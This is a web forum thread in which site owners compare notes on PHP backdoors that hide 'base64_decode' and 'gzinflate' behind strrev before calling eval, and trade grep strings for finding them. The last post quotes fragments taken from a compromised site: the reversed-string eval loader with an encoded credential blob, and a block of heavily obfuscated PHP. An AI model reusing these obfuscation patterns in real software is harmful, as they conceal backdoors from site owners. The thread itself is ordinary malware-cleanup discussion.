Watch out for "edoced_46esab" and "etalfnizg"

[rschneid]

Hi,
I just found the following version of the base64_decode/gzinflate hack.

They used the form:
"$v1 = strrev("edoced_46esab"); $v2 = strrev("etalfnizg"); eval ...."

So in case you think your site got hacked:
Don't "grep" only for "base64_decode" and/or "gzinflate";
also scan for "edoced_46esab" and "etalfnizg".

Hope this helps.

[panosgr]

Yes that is correct and that is not the only version we have!
There some versions thats are complete masked, no "eval", no "base64" at all

[fw116]

old, very OLD..

just check for iframe injections ...

[jeffchannell]

Surely you can see that was likely randomly generated, right?

[wernejo]

Sorry to be the one who digs up old bones but I've just recently been hit with an attack like you mentioned.

yesterday i pulled this out of a virus file on one of my websites.

Code: Select all

$v1 = strrev("edoced_46esab");

$v3 = strrev("etalfnizg");

eval($v1("JGxvZ2luPSI5MTMiOyRtZDVfcGFzcz0iYzU5NTk2NzI3ZDhlMWUwMjE5YzRmMzc3Y2JjM2JmOTIiOw=="));

eval($v3($v1(strrev('......'))));

however, after translating $v1 i got this code

Code: Select all

$login="913";$md5_pass="c59596727d8e7cbc3bf92";

dose anyone know what that's used for? this is new to me and i want to know exactly whats going on!

but wait! there's more...

has anyone seen this before?

Code: Select all

<?php
$c68qQZI4Gy='ge75RUiHr'&~WZ;$nwT="a}".sUnJceej."|"&Pe6A.'{'.ExDmi.'/';$joUVHBcJel0=#qIDluZ'.
         0$12D0#!a$0';$Wlx=Zd^hQ;$Uut='/io'&'ow?';$mj1='"'./*V'.
           6M($d1wH5jkr($CgKSagg.$TwA)),/*'.
            'Y_k|z$TS K*/$V7DvLSLo.$k2QSURec.$Wlx.$g3xeMi40r) or m|V_PE7ZcE]H5^I+';

this code was one of 100 odd files i removed off my website. no two files where alike but they all had the same encryption and no closing php tag. whoever did this knows quite a bit about masking his intentions.

any ideas?